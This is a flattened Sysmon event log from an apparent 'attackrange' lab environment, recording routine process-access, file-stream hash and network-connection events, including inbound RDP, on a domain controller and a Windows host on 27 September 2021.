09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050429Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050428Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050427Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050426Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050425Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050424Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050423Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050422Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050421Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050420Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050419Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050418Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050417Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.556{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1B2658B4AB606CEBB1DCA3C30DCEF787,SHA256=50AE917D6FFBEA7D56BB3E668FCB3E0AABEDC96CEEA0DA5D602DF7F0BD20C7F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050416Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.290{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E46C567A86AE5D5A29499EDA5A12A990,SHA256=9177EF7BA7B5BBD477D2CE1DAF54B5FC1616A918BFE214E7DD05C91A01112ACD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979068Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:01.433{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=859E0E2BB6E3AD945D753D2760A4F363,SHA256=7B4FF49D7796F42B869076A95EF786D045847ED4EEF52BAFD4A13BC9E261B9A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050449Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:01.708{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCE835E63D94C68B47CE003245BF5CD5,SHA256=BE15ED923C8D36F89E026621C11E150F468404E689D704F4446FBA7F1B3E73AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979070Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:02.465{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB379CB56E613458448B845C2B76BC55,SHA256=34D869CA5FF98C4AA204B8899B46A4A55A983298A6CCB6306740C45A420C7BFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050451Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:02.724{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=951C6CDB4D56A5E1D91C1676BF928427,SHA256=940B3CC082D5BF77C7993EF345D14870C32D34E30575497EC1CD3FA47C8C8E9E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979069Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:58.699{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59398-false10.0.1.12-8000- 23542300x80000000000000001050450Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:02.655{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=68AA1526909F31E826ADB1BA78C4BB28,SHA256=F031EAD6F9B6EDB4D4B1E5E7AF9ACDE25D072E4534EBAFDF66B52AEA3DAF2CF6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050453Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:01.040{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63759-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050452Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:03.740{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69D9DF00CAF6B5507D255CF52B8975CA,SHA256=042B9EE19B1E63234FF2F43495264B97CD69C892824A39FBE62EE7FCB6112212,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979071Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:03.483{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5A02338D6854B549F4C96E92C14DC88,SHA256=14F6C6ACA9F74863E2769C9CC54A1D237238FC593766FD62229F7EEB177F1859,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050456Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:04.854{5EBD8912-7F30-614D-1600-00000000FC01}12684776C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050455Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:04.854{5EBD8912-7F30-614D-1600-00000000FC01}12684776C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050454Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:04.754{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C69166AA5A670AFCC38C6A49B69A828B,SHA256=4A2C977B417BE5A1AD116F5036458C8596BB2B7B586D6A8286655A4B9746C121,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979074Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:04.749{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9115846000292DEA960BCEDC193D6894,SHA256=E4E550C119646BBCCE4B15EFC292AF71D3632F7856590C1CC3AD40E9AF42FA60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979073Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:04.749{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=77BC4AEECE79B8CEF6E233571D5B2280,SHA256=D8064E8ED8F3C1EF7B230DA6981E29A1E6786B90C4C4886B6DEBBF138FF330FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979072Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:04.515{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79E94493D6DA64E849CFE9372D242A3A,SHA256=66743AA3C3CED7C6A22F936E58F3C693FF8B96784675A96A6914799DCE2831BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979077Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:05.751{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C030185C262516B6092D67A363414C63,SHA256=44DCAD4960A85E63DC42F0B6273D7DBF922D7EA2777D21F23B2D7888A7C59E6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050457Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:05.754{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EB608C4BED08964A3FA2A56B7E0997B,SHA256=6EB060487B8E1F058AD3C6F96CC178307F4CBCC9E928243E8F4C3FAAD6B2B449,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979076Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:02.069{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com40143-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979075Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:05.269{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4309MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979079Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:06.891{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9356B3E7AF2787197E5C32F481CE5C37,SHA256=B9EDF8F98ECD5F766608AD63D1C7383C8FB3F3566A2B29A56565E96027F70D43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050461Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:06.790{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E60FC22C532D94C4F0C303E82FF1C6AD,SHA256=D088F57087CE4F3EA72E89F6F2DD6BD0BB2FB8E06CCF9FF6927A5B1CD2B26C9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979078Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:06.269{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4310MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050460Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:06.307{5EBD8912-7F2D-614D-0B00-00000000FC01}6246512C:\Windows\system32\lsass.exe{5EBD8912-7F11-614D-0100-00000000FC01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+2b3d4|C:\Windows\system32\lsasrv.dll+30929|C:\Windows\system32\lsasrv.dll+2e287|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+15ded|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001050459Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:06.123{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001050458Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:03.846{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 